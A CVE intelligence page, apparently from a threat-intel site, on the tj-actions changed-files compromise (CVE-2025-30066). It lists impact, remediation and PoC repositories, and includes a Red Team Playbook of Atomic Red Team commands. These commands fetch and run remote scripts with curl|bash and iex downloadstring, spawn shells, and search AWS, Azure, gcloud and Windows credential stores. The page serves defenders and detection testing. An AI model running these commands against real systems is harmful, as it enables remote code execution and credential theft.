CVE-2025-30066
Overview
The vulnerability in tj-actions changed-files is an information disclosure flaw arising from malicious modification of the source code repository. Specifically, tags v1 through v45.0.7 were altered to reference a commit containing unauthorized code, enabling exposure of secrets via the actions logs. The flaw affects the changed-files component of the GitHub Actions workflow, where logs improperly reveal sensitive data due to compromised commit references.
Vulnerability Description
tj-actions changed-files before 46 allows remote attackers to discover secrets by reading actions logs. (The tags v1 through v45.0.7 were affected on 2025-03-14 and 2025-03-15 because they were modified by a threat actor to point at commit 0e58ed8, which contained malicious updateFeatures code.)
Impact
An unauthenticated attacker can remotely access GitHub Actions logs generated by the compromised tj-actions changed-files action, allowing disclosure of secrets such as API tokens or credentials embedded in the workflow environment. This unauthorized data exposure can lead to further compromise of CI/CD pipelines, unauthorized access to repositories, or lateral movement within affected systems. The attack requires no user interaction and leverages the malicious commit present in affected versions, impacting organizations relying on these action versions in their automation workflows.
Solution
Users must upgrade tj-actions changed-files to version 46 or later, which removes the malicious commit and restores secure logging behavior. Refer to the official GitHub advisory and the tj-actions GitHub repository issue #2463 for detailed patch instructions. Additionally, follow the security hardening guidelines outlined in the GitHub documentation on securing GitHub Actions workflows to prevent future compromise. Monitoring and revoking exposed secrets is also recommended as an immediate mitigation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the tj-actions changed-files tool stems from its handling of action logs, which inadvertently exposes sensitive information to remote attackers. Specifically, prior to version 46, the tool allowed unauthorized users to access logs that contained secrets, such as API keys or access tokens. This issue arose when certain tags were modified by a threat actor to point to a malicious commit, which included code designed to update features in a way that compromised the integrity of the logs. The flaw is exacerbated by the fact that action logs are often not adequately secured, making it easier for attackers to exploit this weakness.
Attack vectors for this vulnerability are primarily centered around the ability of an attacker to gain access to the action logs. Once an attacker identifies a repository using the affected version of the tj-actions changed-files tool, they can exploit the vulnerability by triggering actions that generate logs. By analyzing these logs, attackers can extract sensitive information that should have been protected. Scenarios may include unauthorized access to repositories where the logs are publicly accessible or where insufficient access controls are in place. Additionally, if an attacker can manipulate the repository settings or gain credentials, they could further escalate their access and exploit the vulnerability more effectively.
The real-world impact of this vulnerability can be significant for organizations relying on the tj-actions changed-files tool. Exposure of secrets can lead to unauthorized access to other systems, data breaches, and potential financial losses. For instance, if API keys are leaked, attackers could exploit them to access cloud services, leading to data theft or service disruption. Furthermore, the reputational damage associated with such incidents can be severe, resulting in loss of customer trust and potential legal ramifications. Organizations may also face compliance issues if sensitive data is mishandled, which can lead to regulatory fines and increased scrutiny.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. First, regular audits of action logs should be conducted to identify any unauthorized access or anomalies. Employing security tools that monitor repository activity can help in detecting unusual patterns indicative of exploitation attempts. Additionally, organizations should upgrade to the latest version of the tj-actions changed-files tool to ensure they are protected against this vulnerability. Implementing strict access controls and ensuring that sensitive information is not logged in action logs are critical steps in mitigating the risk. Moreover, educating developers about secure coding practices and the importance of safeguarding secrets can further reduce the likelihood of exploitation.
In conclusion, the vulnerability in the tj-actions changed-files tool highlights the importance of secure logging practices and the need for vigilant monitoring of repositories. By understanding the technical details, potential attack vectors, and real-world impacts, organizations can better prepare themselves against such threats. Proactive detection and mitigation strategies are essential to safeguard sensitive information and maintain the integrity of their systems. As the threat landscape continues to evolve, staying informed and adopting robust security measures will be crucial in defending against similar vulnerabilities in the future.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2025-30066, accompanied by the emergence of new proof-of-concept tools designed to facilitate unauthorized access via compromised tj-actions changed-files logs. This development indicates that threat actors are refining their capabilities to leverage the vulnerability more effectively, broadening the exploit landscape beyond initial observations. The slight uptick in the EPSS score reflects an increased likelihood of exploitation in the wild, underscoring the growing operational interest in this flaw. For defenders, this evolution signifies a heightened risk of sensitive information disclosure through action logs, potentially enabling further intrusion or lateral movement within affected environments. Consequently, the threat level associated with this vulnerability has intensified, warranting increased vigilance in monitoring related telemetry and adapting detection strategies accordingly.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Tj-Actions | Changed-Files | All |
cpe:2.3:a:tj-actions:changed-files:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Checkmarx/Checkmarx-CVE-2025-30066-Detection-Tool
|
Checkmarx | 1 | 0 | 2025-03-18 | View |
|
Super-Vulnerable-Org/compromised-action
Test repo: simulates CVE-2025-30066 style compromised GitHub Action (for security research/testing chainradar)
|
Super-Vulnerable-Org | 0 | 0 | 2026-05-14 | View |
Threat Feed
7 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (7)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-442 | Infected Software |
33%
|
Medium | High | |
| CAPEC-636 | Hiding Malicious Data or Code within Files |
33%
|
— | High | |
| CAPEC-448 | Embed Virus into DLL |
30%
|
Medium | High |
Red Team Playbook
45 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null 2>&1 && echo '--- package.json before install ---' && cat package.json && npm install #{package_name} --no-audit --no-fund --no-package-lock && echo '--- package.json after install ---' && cat package.json"
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.